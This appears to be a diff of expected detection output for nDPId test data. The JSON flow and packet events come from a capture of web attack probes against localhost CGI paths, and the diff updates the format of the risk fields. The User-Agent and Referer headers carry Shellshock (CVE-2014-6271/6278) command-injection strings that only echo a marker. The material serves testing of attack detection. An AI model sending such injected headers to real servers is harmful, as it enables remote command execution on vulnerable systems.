 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
